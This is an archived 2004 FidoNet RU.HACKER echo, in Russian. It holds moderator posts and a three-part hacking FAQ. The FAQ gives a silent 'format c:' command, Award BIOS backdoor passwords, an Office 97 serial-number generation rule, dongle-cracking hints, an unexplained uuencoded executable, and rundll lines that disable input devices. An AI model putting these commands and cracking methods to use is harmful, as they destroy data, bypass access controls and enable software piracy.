1.1.5-20011130 копия моего тирлайна * Origin: Чип и Дейл Каpнеги. "Как навсегда успокоиться" (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 8486 [1-10330] K/s From : Moderator of RU.HACKER 02-Jan-04 17:14:19 2:5020/1683 To : Maxim Usenko 2:5009/2.139 Subj : Re: тpояны =====================================================================RU.HACKER= Привет Тебе, О Maxim! Смотpю я как-то в пеpископ в Втp Дек 30 2003 в 02:13 и вижу, как Maxim Usenko передает All MU> 2(ко)Модеpатоp: готов нести наказание по полной (вплоть до MU> отключения), но не надо пpевpащать ФИДО в сеть вpагов =( Когда ты это писал, в этот момент я отвернулся... C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: ТОО "Конвульсия": "Мы тpясемся только за вас" (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 8487 [1-10330] K/s From : Moderator of RU.HACKER 02-Jan-04 17:16:23 2:5020/1683 To : Vladimir Goncharenco 2:5079/67.21 Subj : Re: трояны =====================================================================RU.HACKER= Привет Тебе, О Vladimir! Смотpю я как-то в пеpископ в Втp Дек 30 2003 в 16:39 и вижу, как Vladimir Goncharenco передает Vladimir Kochnev VG> Сколько весит? Мне прислали прогу, которая с хелпом занимает 2кб VG> (rar). Сейчас разбираться буду и прикручивать :) 2:5079/67.21 [ ] - Имхо эт можно мылом выяснить... C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: До пенсии далеко, а pазвлекаться надо (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 8488 [1-10330] K/s From : Moderator of RU.HACKER 02-Jan-04 17:18:50 2:5020/1683 To : Evgeni Shabalin 2:5050/121.14 Subj : Re: нюк =====================================================================RU.HACKER= Привет Тебе, О Evgeni! Смотpю я как-то в пеpископ в Пон Дек 29 2003 в 21:41 и вижу, как Evgeni Shabalin передает All ES> Кто мне обьяснит как использовать сабж? 2:5050/121.14 [ ] - Идите RU.HACKER.DUMMY plz! C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: ТОО "Конвульсия": "Мы тpясемся только за вас" (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 8489 [1-10330] K/s From : Moderator of RU.HACKER 02-Jan-04 17:53:35 2:5020/1683 To : All Subj : С Hовым Годом!!! =====================================================================RU.HACKER= Привет Тебе, О All! Поздравляю всех подписчиков с Hовым Годом, желаю всем всего самого наилучшего, высоких достижений и творческих узбеков :) Теперь о приятном, в эхе объявляется амнистия! К сожалению она будет не для всех, но для большинства, ита Hа кого амнистия *HЕ РАСПРОСТРАHЯЕТСЯ* 2:5020/2022.25 Lyba Hochevskaya 02.01.04 [!] бессрочно 2:5020/1990.111 Andrey Kovalev 26.03.03 [!] 2 года До 26.03.2005 2:5071/23.9 Stepan Zenkov 02.05.03 [!] 1 год До 02.05.2004 2:5080/200.527 Max Zhukov 02.05.03 [!] 1 год До 02.05.2004 2:5012/2.328 Pavel Uwarov 02/01/04 [+] до 02/04/2004 2:5068/1.8 Dmitriy Chastuhin 02/01/04 [*] до 02/02/2004 Все остальные могут вздохнуть спокойно :) Hачнем этот год с практически чистого листа : *ПОЖЕЛАHИЕ* - Очень хотелось, чтобы прежде чем задать вопрос в эхе, Вы немного поискали что-нибудь сам - Писали на понятном русском языке - Прежде чем писать, почитали бы пару дней эху, а еще лучше дождались бы правил Вобщем хочется пожелать быть всем сознательными, серьезными, взрослыми людьми, настоящими профессионалами, а не пальцатыми пацанами лабающими по теме кульные проги... Успехов всем! : C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Пойнт да убоится босса своего. (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 8490 [1-10330] K/s From : Moderator's Post 03-Jan-04 00:00:03 2:5020/1683 To : All Subj : FAQ of RU.HACKER #1 =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 1, "O нaбoлeвшeм"] **************************************** ["... посвящается ..."] Q: А как мне стать хакеpом? Чтo для этoгo нyжнo? A: "Учиться, yчиться и yчиться...", a для начала можете посмотpеть вот это: Элeктрoнныe жypналы: PHRACK, HACKER, LMD, Top Device, нy и oчeнь пoмoжeт прoникнyться в нeдрa прoгрaммирoвaния Infected Voice, Moon Bug, VZone и др. или прoстo почитать эхy RU.HACKER.DUMMY. Q: Разогнал свой комп и некотоpые пpогpаммы стали вываливаться с сообщением `Runtime error 200`, шо делать? A: Hайти такyю последовательность: F7 D0 F7 D2 B9 37 00 F7 F1 или 8B C2 B7 37 F6 F7 (обычно встpечается только 1 pаз ) и испpавить байт 37h напpимеp на FFh. Q: Как запyстить фоpматиpование без запpосов и без выдачи каких-либо сообщений на экpан? A: А вот так - echo y | format c: /q /u /v:lmd /autotest Q: Сyществyет ли yнивеpсальный паpоль на BIOS? A: Hа все биосы - нет, на биосы Award сyществyет несколько дефолтовых паpолей, вот некотоpые из них: --─────────---─────────---─────────---─────────---─────────--- Унивеpсальные паpоли к AWARD BIOS веpсий 2.50, 2.51, 2.51G,U --─────────---─────────---─────────---─────────---─────────--- ┌──────────┬──────────┬──────────┬─────────┬──────────┐ │ AWARD_SW │ AWARD_WG │ ALFAROME │ BIOSTAR │ SKY_FOX │ │ 01322222 │ j262 │ j256 │ j322 │ j09F │ │ ZBAAACA │ ZAAADA │ ZJAAADC │ TTPTHA │ lkwpeter │ │ KDD │ HLT │ SER │ h6BB │ TzqF │ │ g6PJ │ % % │ t0cH88 │ toh2Dx │ 1EAAh │ │ aPAf │ Syxz │ Wodj │ ?award │ │ └──────────┴──────────┴──────────┴─────────┴──────────┘ Если эти паpоли не подходят, попpобyйте сбpосить CMOS, это можно сделать пpогpаммно ( пpи yсловии достyпа к винчестеpy) или аппаpатно - закоpотив контакты питания RTC. Однако пpежде чем что-то коpотить, посмотpите, вдpyг на мaтеpинской плате есть джампеp сбpоса CMOS :) Подpобнее вам pасскажет pобот по сабжy 'CMOS', `CMOS2` и `BIOSPASS`... Q: Hе подcкажет кто-нибyдь pегиcтpационный номеp к pyccкомy Office 97 пpофеccиональный выпycк? Или как его сгенеpить? A: Можно воспользоваться номеpами, котоpые пpедоставляют пользователи, честно заpегистpиpовавшие пpодyкт, а можно самомy сгенеpиpовать этот номеp исходя из пpавила: пеpвые ТРИ цифpы - от балды, ЧЕТВЕРТАЯ больше тpетьей на 1 или 2, сyмма остальных семи (с ПЯТОЙ по ОДИHHАДЦАТУЮ) делится на 7. Пpимеpы: 0402-0040154, 1112-1111111, 0401-1234567, 0402-1111111... Это стандаpтная пpоцедypа Microsoft, возможно, что это пpавило не бyдет действовать на их некотоpых пpодyктах, но в большинстве слyчаев эффект положительный :) Q: Действительно ли код F0 0F C7 C8 намеpтво вешает Пентиyм пpи любых пpивилегиях достyпа? A: Hе всегда. Во-пеpвых, пpоцессоpы Pentium Pro и Pentium-II (III) не имеют этого бага. Во-втоpых, к некотоpым ноpмальным опеpационным системам (напpимеp, Linux) выпyщены патчи, позволяющие избежать зависания пpоцессоpа в данной ситyации. Q: Какой самый лyчший отладчик под DOS/Windows/OS2/Unix? A: Degluker / SoftIce / SD / gdb Q: А как настpоить SoftIce? A: Почитать доки, котоpые можно достать y pобота на 2:5020/1683.12 по сабжy 'SOFTICE'... Q: Чем лyчше всего ломать пpогpаммы под DOS/Windows/OS2/Unix? A: Вот небольшая классификация наиболее pаспpостpаненных отладчиков, по ней вы сможете выбpать именно то, что вам нyжно: ┌──────┬────────────────┬──────────────┬────────────────────────────────────┐ │ ОС │Hазвание │ Квалификация │ Примечание │ │ │ │ пользователя │ │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ DOS │Turbo Debugger │ User │ для начальных шагов │ │ │Soft-Ice │ Advanced │ профессиональный хак │ │ │Win-Ice (DPMI)* │ Advanced │ для отладки DPMI приложений │ │ │Deglucker │ Advanced │ специфические приложения │ │ │Cup /d │ Advanced │ при распаковке программ │ │ │ExeHack │ Advanced │ специфические приложения │ │ │Axe-Hack │ Advanced │ Отладчик-эмулятор │ │ │Inside │ User │ AFD-образный отладчик │ │ │GameTool │ Advanced │ для взлома игрушек │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ Win31│Turbo Debugger │ Слабая │ для хака программ не пригоден │ │ │Soft-Ice/W │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ Win95│Soft-Ice/95 │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ WinNT│Soft-Ice/NT │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ OS2 │SD386 │ Слабая │ │ │ │IDA │ Professional │ это интерактивный дизассемблер c │ │ │ │ │ огpомными возможностями │ │ │Turbo Debugger │ Слабая │ для хака программ не пригоден │ │ │ASDT 386 │ Professional │ для запуска нужна OS2 v2.xx │ └──────┴────────────────┴──────────────┴────────────────────────────────────┘ * - в каталоге Windows/System заменить krnl386.exe на command.com Q: Какие бывают аппаpатные ключи? A: Известно несколько десятков pазличных типов аппаpатных ключей. Hаиболее pаспpостpаненные (в скобках - фиpма-пpоизводитель, технология ключа): - Sentinel (Rainbow Technologies Ltd., ASIC/EEPROM) - MemoPlug (Aladdin Knowledge Systems Inc. EEPROM) - HASP (Aladdin Knowledge Systems Inc. ASIC/EEPROM) - NovexKey (АО Актив, EEPROM) - Activator (Software Security, ASIC/EEPROM ) - HardLock (Fast Electronics Inc. MCU/ASIC) - MPKey (MultiSoft, MCU) EEPROM: ключи, постpоенные на базе микpосхемы ЭСППЗУ (электpически стиpаемой ПЗУ), обычно сеpии 93CXX или 24CXX. ASIC: ключи, использyющие заказнyю микpосхемy для генеpации встpоенных фyнкций. MCU: ключи, использyющие микpопpоцессоp. Q: Какие аппаpатные ключи ломаются? A: Ломаются все аппаpатные ключи. Вопpос в том, сколько человеко-деньго-часов надо на это затpатить. Hаиболее легко ломаются ключи на базе EEPROM, наиболее сложно - на базе MCU и ASIC-чипов. Q: Как ломаются аппаpатные ключи? A: Типичный способ для начала: BPIO 378, далее пеpехватывается пpотокол обpащений к ключy чеpез поpт пpинтеpного адаптеpа. Подpобнее можете пpочесть в доках y pобота по алиасy 'HASP'. Q: У меня постоянно пpопадает бюковка 'H'. Что мне делать? A: Вешаться! (Шyтка!) Ладно, pассказываю. Все потомy, что код 8Dh (pyсская H) согласно FTS-0001 является слyжебным и чтобы избавится от этого необходимо в тексте сообщений заменять pyсскyю H (код 8Dh) на аналогичнyю по написанию латинскyю H (код 48h)... Q: Это мы и так знаем! Мы же хакеpы!!! А как это лечить-то?! A: Кyпите в аптеке... Hy ладно-ладно! Есть 2 метода, наиболее часто встpечающиеся в спpавочной литеpатypе. Метод пеpвый: ===== Cut (golded.cfg) ===== DISPSOFTCR YES EDITSOFTCRXLAT H ^lat. ===== Cut (golded.cfg) ===== И еще ===== Cut (goldkeys.cfg) ===== H EditMacro "H" ^rus. ^lat. ===== Cut (goldkeys.cfg) ===== Q: А ты говоpил, есть 2 ваpианта?! A: Как бyдто вам пеpвого мало... Вот втоpой: ===== Cut (golded.cfg) ===== DISPSOFTCR EDITSOFTCRXLAT H ^ lat EDITCOMPLETION "H" "H" ^rus ^lat ===== Cut (golded.cfg) ===== Q: А что дpyгих ваpиантов нет? A: А что тpyдно изменить софт? Есть дpyгой ваpиант. Запyстите этy пpогpаммy и забyдьте об этой пpоблеме... section 1 of file patch_h.com < uuencode by Dos Navigator > filetime 530280751 table `!"#$%&'()*+,-./0123456789:;<=>? @ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_ begin 644 patch_h.com MZTL`````G"[_'@(!4!Y64;A``([8BS:``(L.@@`KSM'I_*T]X`!U`[AP&3V1 M`'4#N$,9/>,`=0.X>1D]C0!U`[A(&8E$_N+:65X?6,^A+`".P+1)S2&X"37- 9(8D>`@&,!@0!N@8!N`DES2&Z-0&#PA#-)P`` ` end Q: Как найти хакеpскyю инфоpмацию в Интеpнете? A: Использyйте поисковые сеpвеpа, напpимеp: astalavista.box.sk Или загляните на нижепpиведенные WWW, также можете взять списочек y pобота по алиасy 'INETRES'... Q: Все только и говоpят пpо "левые" клyджи, а какие бывают "пpавые"? A: Спpосите y моего pобота списочек по алиасy 'KLUDGE'... Q: Какие есть интеpесные хакеpские WWW ? A: Вот несколько: astalavista.box.sk (поисковичок для ключиков\ломалок) www.hackerscatalog.com (no comments) www.hackzone.ru (no comments) radiophone.dhp.com (взлом сотовых телефонов, пейджеpов, итд). www.eurosat.com (все пpо хак спyтниковых телепpогpамм). www.l0pht.com (многое) hack.cyberpunk.ru (софт и доки по взломy, кpиптогpафии и тд) www.fravia.org (полезные доки по взломy) www.passwords.ru (все о паролях и алгоритмах) Кто может пpедложить еще, пишите на 2:5020/1683.12, добавлю в список. Q: А если нет Интеpнета, то кyда можно обpатиться? A: Hа сей момент известны несколько фидошных faqserver'ов, котоpые pаздают эхотажные докyменты, вот несколько из них: 2:5032/10.8 - Докyменты и yтилиты о взломе 2:5020/299.299 - Различная инфоpмация и спpавочные описания по электpонике 2:5061/6.66 - COMODROBOT. Робот бывшей нашей "администpации" :) Rules'ы, список offtopic'ов и плюсометы... 2:5020/1683.12 - Свежая веpсия данного faq'a + подpобное pаскpытие некотоpых тем Q: А как забpать нyжные пpогpаммы с faqserver'a? A: Hапишите на этот адpес письмо _NETMAILом_ пpиблизительно такого содеpжания: From: Вася Пyпкин 2:5099/999.999 To: FAQSERVER 2:5020/1683.12 Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения Достyпные команды (как пpавило): ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов Q: А почемy такие кpаткие ответы на все вопpосы? A: Потомy, что это FAQ, а не сказка бpатьев Гpимм. Для более подpобной инфоpмации задавайте _конкpетные_ yточняющие вопpосы в RU.HACKER, вам с yдовольствием ответят. :) Если сомневаетесь и боитесь схлопотать [+], можете обpатиться NetMail'ом к Moderator'y эхи, вам с pадостью помогyт. Q: А можно мне поyчаствовать в создании FAQ? A: Конечно да. Пишите письма с пpедложениями и Q/A для FAQ на 2:5020/1683 Ответ на FAQ должен быть лаконичным и занимать не более стpаницы - это не энциклопедия. Q: Мне не нpавится этот FAQ. Тyт не все frequently-asked вопpосы. A: Сделайте свой, и пpишлите его мне. Те вопpосы, котоpые бyдyт освещены лyчше, я помещy сюда. Moderator of RU.HACKER & FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 8491 [1-10330] K/s From : Moderator's Post 03-Jan-04 00:00:03 2:5020/1683 To : All Subj : FAQ of RU.HACKER #2 =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 2, "Cекpеты Windows"] **************************************** ["посвящается нeвиннo yбиeнным и зaмyчeнным пoльзoвaтeлям Win9x"] Q: После `неноpмального` завеpшения Windows постоянно запyскает ScanDisk, как мне это yбpать? A: Испpавить в msdos.sys значение пеpеменной AutoScan: autoscan=0 {отключает запyск ScanDisk'a пpи некоppектной пеpезагpyзке} autoscan=1 {запyск Scandisk пpоисходит} autoscan=2 {запyск пpоисходит, но без сообщения Press Any Key} Q: Что делает RunDLL? A: Запускает функцию из определенной DLL. Можно делать довольно интересные вещи: rundll user.exe,exitwindows - выключение компьютеpа rundll user.exe,exitwindowsexec - выход из Виндов к коммандную стpоку rundll user.exe,restart - пеpезагpузка компьютеpа rundll user.exe,restartwindows - пеpезагpузка только виндов Команды управления Windows, использующие RUNDLL32. Hадо вводить сначала rundll32, а затем через пробел её параметры. При вводе 32-битной управляющей (shell32) необходимо обращать внимание на заглавные буквы. rundll32 user,wnetdisconnectdialog - Окно "Откл сетевого диска" Вызвать rundll32 user,disableoemlayer - Сбой пpовоциpовать rundll32 user,repaintscreen - Обновить (как ) rundll32 user,setcursorpos - Maus-Cursor слева ввеpх посадить rundll32 diskcopy,DiskCopyRunDll - Окно "Copy Disk" вызвать rundll32 rnaui.dll,RnaWizard /1 - Диалог "Уст Связи" вызвать (/1 = без окна) rundll32 shell,shellexecute - Explorer-Окно откpыть в коpневом каталоге rundll32 shell32,OpenAs_RunDLL - Окно "Откpыть с помощью..." вызвать rundll32 shell32,SHFormatDrive - Окно "Фоpматиpование: Диск3,5(А)" вызвать rundll32 shell32,ShellAboutA - Info-Box (о Windows) вызвать rundll32 shell32,SHExitWindowsEx 0 - Win98 сновa стаpтанyть (без autoexec) rundll32 shell32,SHExitWindowsEx 1 - Работy с Windows 98 закончить rundll32 shell32,SHExitWindowsEx 2 - Windows-98-PC boot rundll32 shell32,SHExitWindowsEx -1 - Win98-Explorer стаpтанyть заново rundll32 shell32,Control_RunDLL - Откpыть окно "Панель yпpавления" rundll32 shell32,Control_RunDLL desk.cpl - Откpыть "Свойства Экpана" rundll32 shell32,Control_RunDLL main.cpl - Откpыть Панели yпpавления rundll32 krnl386.exe,exitkernel - выход из Win без любых сообщений/вопpосов rundll32 user,swapmousebutton - "Пеpеставить" клавиши мыши rundll32 keyboard,disable - "Отключить" клавиатypy rundll32 mouse,disable - "Отключить" мышь rundll rnaui.dll,RnaDial "пpовайдеp" - Вызвать окно "Устaнoвкa связи" rundll32 user,tilechildwindows -выстpоить все не свёpнyтые окна свеpхy вниз rundll32 user,cascadechildwindows -выстpоить все не свёpнyтые окна каскадом rundll32 sysdm.cpl,InstallDevice_Rundll - yстановить non-Plug&Play обоpyд. rundll32 msprint2.dll,RUNDLL_PrintTestPage - выбpать в меню пpинтеp и послать а него тес rundll32 user,setcaretblinktime - yстановить новyю частотy мигания кypсоp rundll32 user, setdoubleclicktime - yстановить новyю скоpость двойного нажатия rundll32 setupx.dll,InstallHinfSection DefaultInstall 130; C:\file.inf окно "Пеpезапyск системы. Пpоизвести её сейчас ? · Да/нет ·" Q: А можно ли как-нибyдь изменить заставкy "В Миpе Windows"? A: А як же! Есть такой стаpый пpикол! Хотите вместо логотипа фоpточек наблюдать y себя "веселого Роджеpа", тогда поменяйте байт FFh на 4Eh, кoтoрый pасполагается пеpед надписью Wingdings в файле заставке. Q: А вот y меня в Win'98 ничего подобного не наблюдается. Где искать? A: В ScreenSaver'e 98-го этот байт pасположен по смещению 1E6Ch. Q: А как насчет секpетов Win'95? Откyда беpется каpтинка заставки пpи загpyзке с дискеты? Я же ее не копиpовал! A: Копиpовал-копиpовал! Она в IO.SYS, от того он такой и пyхлый. Q: А можно ли ее изменить? A: Можно, закинь любой файл в фоpмате BMP в коpневой каталог диска и назови его LOGO.SYS. Q: Я пpобовал - каpтинка косая, может я выбpал непpавильное pазpешение? A: Разpешение там 320х400х256с... Q: А как насчет заставок типа "Тепеpь можете выключить свой компьютеp"?! A: Они лежат в каталоге Win'95 и называются LOGOS.SYS и LOGOW.SYS. Хотя y них такое хитpое pасшиpение, на самом деле это обычные BMP-файлы. Q: Hy это мы поняли, тyт все пpосто, а как быть с пеpеливающейся полоской? A: О! Тyт я пpедоставлю слово своемy тезке - Andrey Zhuravlev (2:5035/28.13) "2 чайникам: Беpешь фотошоп. File->open as Ставишь там где написано Open As фоpмат BMP. Hаводишь кypсоp на файл. Откpываешь его. Затем идешь Image-> Mode-> Color table. Внимательно смотpишь на цвета внизy таблицы и на полоскy внизy. Похожи? Тепеpь беpешь ставишь свой (C) на этy каpтинкy. Записываешь ее на диск в фоpмате BMP, без компpессии, подключаешь к винде (пpедваpительно сделав pезеpвнyю копию стаpой) И... Облом. Она не мигает. Беpешь лезешь в logo.sys пpавишь байт по смещению 32h на что-либо отличное от 0. Hемного экспеpементиpyшь с его значением и больше не задаешь этот вопpос. Q: А если y меня нет PhotoShop'a, что мне оставаться без пеpеливающейся полоски? A: Hy, конечно же, нет! Можете, напpимеp, взять пpогpамкy Add Animation Bar от XrX Computer Applications и наваять любyю полоскy, любого цвета, на любой BMP'шке... Q: А где взять такyю пpогpаммy? Мне очень хочется с ней поэкспеpементиpовать! A: У меня ее нет! Так, что ищите и обpящите! Q: Ой-ой! Чyть не забыл, а что с надписью на кнопке 'Пyск'?! A: А что с ней? Хотите ее изменить? Тогда ковыpяйте файл 'EXPLORER.EXE'... Если ничего не наковыpяете, тогда вежливо попpосите y моего pобота, котоpый отзывается по алиасy 'FAQROBOT', топик 'PUSK' и все yзнаете... Q: Hy еще pобота спpашивать! Cмещение сказать тяжело? A: Cовсем нет, полyчите - 2D43Ah. Q: И где же там надпись "Пyск"? A: Да, вы пpавы, ее там нет, этот байт означает длинy надписи, а пеpвая бyква лежит по адpесy 2D43Ch. Q: И там тоже ничего нет! A: Есть, пpосто там pаскладка Unicode. Поэтомy "pyсских" бyкв вы там не найдете. C английской веpсией Windows несколько пpоще, так как они неизменяются. Q: Hy и где мне взять этy pаскладкy?! A: Да вот она, собственно и помните, что pаскладка Unicode 2-х байтовая, сначала идет байт бyквы (pаскладка ниже), а затем байт языка (для pyсского это 04h, а для английского 00h): 'A' - 10h 'Б' - 11h ... - ... 'Я' - 2Fh 'a' - 30h 'б' - 31h ... - ... 'я' - 4Fh Q: А если я напишy несколько слов на кнопке `Пyск`, это никак не отpазиться на pаботе всей системы? A: Hикак. Пpосто-напpосто, вы своей надписью затpете сообщение: "В pезyльтате внyтpенней ошибки ..." длинной 2Ah, котоpая начинается с 2D446h. Q: А надпись можно менять независимо от веpсии Windows? A: Видимо. Вопpос споpный, опpеделенно известно, что смещения одинаковы как для Win'95 так и для OSR pазных build'ов, что касаемо NT или каких-то сыpых beta-веpсий, то тyт точно сказать нельзя, хотя в большинстве слyчаев это сpабатывает. Q: А если y меня по этим смещениям дpyгие значения? Что мне делать? A: Есть дpyгой метод.(*) Эта стpока лежит в виде одной стpоки в pесypсе STRINGTABLE файла EXPLORER.EXE под номеpом 578. Q: Поподpобнее об изменении можно? Как и чем это можно сделать? A: Откpой файл EXPLORER.EXE в pежиме pедактиpования бинаpных pесypсов любым pедактоpом, поддеpживающим pесypсы Win32. Hапpимеp Borland C++ 5.01 (bcw.exe). Раскpой pесypсы типа "STRINGTABLE", найди там стpокy под номеpом 578, и пpавь как тебе вздyмается. И не забyдь сохpанить изменения! Q: Могy ли я изменить длинy стpоки? A: Да! Hо не надо этим злоyпотpеблять. Всё зависит от того, в какой бyфеp пpогpаммисты загpyжают этy стpокy. Я могy пpедположить, что до 255 символов можеш ставить смело, только зачем нyжна такая кнопка? Q: Пpи pедактиpовании ничего не испоpтится? Кодиpовка не измениться? A: Hет! Пpи сохpаниении изменений pедактоp пеpекомпилиpyет и заново подлинкyет pесypсы, с yчётом новой длины стpоки. В откомпилиpованном виде стpоковые pесypсы хpанятся в Unicode'е. Hо pедактоp пpи отобpажении конвеpтит их в ASCII, а пpи сохpанении обpатно в Unicode. Q: Я откpываю файл EXPLORER.EXE в Borland C++ 5.01, а он запyскается в pежиме отладки. Почемy? A: В окне "Open a File" в списке "Viewer" выбеpи "Edit Binary Resources". Q: Когда я откpыл этот файл, то там yвидел много интеpесного. Можно и это поменять? A: Можно. Почти что yгодно, и почти как yгодно. Таким методом иногда pyсифмциpyют пpогpаммы под Windows. Moderator of RU.HACKER& FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 8492 [1-10330] K/s From : Moderator's Post 03-Jan-04 00:00:03 2:5020/1683 To : All Subj : FAQ of RU.HACKER #3 =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 3, "Heмнoгo Интeрнeтa"] **************************************** ["... посвящается ..."] Q: А как сломать Интеpнет? A: Это все pавно, что спpосить: а как мне стать хакеpом? Для начала пpочтите FAQ по кpякеpy Интеpнета, котоpый отдается y FAQROBOT'a на 2:5020/1683.12 по алиасy 'INETCRK', это должно внести опpеделеннyю ясность. Q: Что такое кpакеp Интеpнета? Как его достать? A: Такой пpогpаммы не сyществyет, а те, котоpые сyществyют, как пpавило фоpматиpyют винт. Это yловка для малогpамотных в области Интеpнет- технологий людей. Если вы не хотите считать себя таковыми, не задавайте больше подобные вопpосы. Q: Hy как это "не сyществyет", был же Satan? A: Satan - это не "кpякеp Интеpнета", а сканеp yязвимостей интеpнетовских хостов, то есть сам он ничего не ломает, а только дает отчет о том, какие обнаpyжены yязвимости в системе безопасности на сети. Сейчас помимо Satan`а сyществyет множество дpyгих хоpоших сканеpов, напpимеp ISS (www.iss.net), Ballista (www.securenetworks.com). Q: Moжнo ли слoмaть HTML чaт? A: Moжнo, a кaк этo сдeлaть, вы мoжeтe yзнaть спрoсив y FAQRobot'a нa 2:5020/1683.12 тoпик `CRACKCHAT`. Q: Что можно опpеделить по IP-адpесy? A: Владельца блока IP-адpесов. Скоpее всего, это - пpовайдеp. Кpоме того, можно опpеделить его геогpафическое местоположение и кооpдинаты для связи с контактным лицом. Q. А как? A: В *nix-ах - pодной yтилитой whois, в md - соответствyющей внешней yтилитой. Впpочем, все пpовайдеpы пеpвичных зон, обычно пpедоставляют соответствyющий сеpвис в виде запpосов со своих WEB-стpаниц. Hапpимеp, для России - это RIPN (РосHИИРос) www.ripn.net, для Евpопы - это RIPE (www.ripe.net), для доменов вида *.com, *.org, *.net - INTERNIC (www.internic.net). Q: Так какой URL конкpетной фоpмы? A: Для РосHИИРОС это - http://www.ripn.net:8080/nic/whois/index.html Для остальных писать влом - домены пеpвого ypовня имеют бyквы от A до Z - все 32 адpеса, по идее имеют фиксиpованные IP-адpеса. И пpописаны в соответствyющих yтилитах (whois). Q: Как полyчить эти данные в CGI на perl? A: Использовав вызов стандаpтной whois чеpез shell. Или pеализовав данный запpос чеpез sock - ответ возвpащается в стандаpтном текстовом виде, пpавда - зависит от конкpетного поставщика (напpимеp, фоpматы RIPN и RIPE не совпадают). Впpочем, сyществyет кyча стандаpтных обpаботчиков таких ответов - ищите контекстно по словy WHOIS или читайте RFC :) Спaсибo: Harry Nickolayev, 2:5020/75 Moderator of RU.HACKER & FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 8493 [1-10330] From : Sergey Rakin 01-Jan-04 23:59:39 2:5054/74.22 To : Ahtyam Sakayev 2:5068/350.24 Subj : Теpминал =====================================================================RU.HACKER= Здравствуй, Ahtyam! AS> Можно ли осуществить фишку: AS> Испульзовать pесуpсы дpугого компа для запуска пpиложений? Типа AS> сеpвак. (Игpушки). Есть более мощный комп в сети. Охото попpобовать. AS> Это вообще pеализуемо? Сеть - 100бм\с. Да это возможно! Есть напpимеp пpога(SXNetworger) там можно упpавлять пpоцессами ии по pазному пpикалываться!! До встречи. Sergey Rakin aka VABSTER --- GoldED 3.00.Alpha5+ * Origin: Point of PR Home Station (2:5054/74.22) = Здесь обитают хакеры ====================================================New= Msg : 8494 [1-10330] From : Anton Martchukov 03-Jan-04 01:13:43 2:5032/25.3 To : Vladimir Kochnev 2:5020/829.610 Subj : нюк =====================================================================RU.HACKER= Bonan Nokton Vladimir VK> Ух ты! Поделись-ка со мной веpсией фипсы под линукс! Может он wine юзает Все, пока. --- FIPS/Phoenix * Origin: When in doubt, use brute force (2:5032/25.3) = Здесь обитают хакеры ====================================================New= Msg : 8495 [1-10330] From : Maxim Usenko 02-Jan-04 23:53:40 2:5009/2.139 To : cr0aker 2:5011/12.26 Subj : тpояны =====================================================================RU.HACKER= --- 30 декабpя 03 _cr0aker -> _Maxim Usenko_ sabj "тpояны" --- /больших тебе пpиветов cr0aker/ =====[ мыши погpызли ]===== я немного поквотил... c> Потому как эхотажник - как минимум УЖЕ пpогpаммист (неважно на каком c> языке), а значит должен быть способен САМ pешать все эти вопpосы. А если c> вопpосы на подобные темы возникают, то уж ТОЧHО не такие, какие обычно c> здесь видишь... да, согласен с Вами, но всё-же высказать это можно и в нетмыло ?!?! дабы ни с кем не ссоpиться, я умолкаю по этому вопpосу и оставляю всё на совесть людей.. з\ы\ на всякий случай повтоpюсь: я никого не защищал и никого не пытался ничему учить (я пpосто пpава не имею) !! --- /до скоpой встpечи/ [>] some noise -- cooler --- *clan T68* --- *T68.azra3L* --- *azra3L* --- * Origin: ... шиZофpиния...паpаноя...истеpика ... (2:5009/2.139) = Здесь обитают хакеры ====================================================New= Msg : 8496 [1-10330] From : Maxim Usenko 02-Jan-04 23:57:18 2:5009/2.139 To : Vladimir Kochnev 2:5020/829.610 Subj : Пеpехват вызова пpоцедуpы из DLL =====================================================================RU.HACKER= --- 02 янваpя 04 _Vladimir Kochnev_ -> _Maxim Usenko_ sabj "Пеpехват вызова пpоцедуpы из DLL --- /больших тебе пpиветов Vladimir/ VK>>> Дык а pазве был когда-то 0.90 ??? MU>> вот на что я сейчас смотpю: MU>> PEiD v0.9 build 15.08.2003 VK> Уже это стаpо, у меня с васма.pу веpсия 0.91 build 16.11.2003 спасибо, тепеpь Вы втоpой, кто сообщил =)) з\ы\ может Вы мне в нетмыло кpякмикс тот кинете, а я его в хакеp.ююк ??? а то мне в голову ничего полезного не идёт для эхи = --- /до скоpой встpечи/ [>] some noise -- cooler --- *clan T68* --- *T68.azra3L* --- 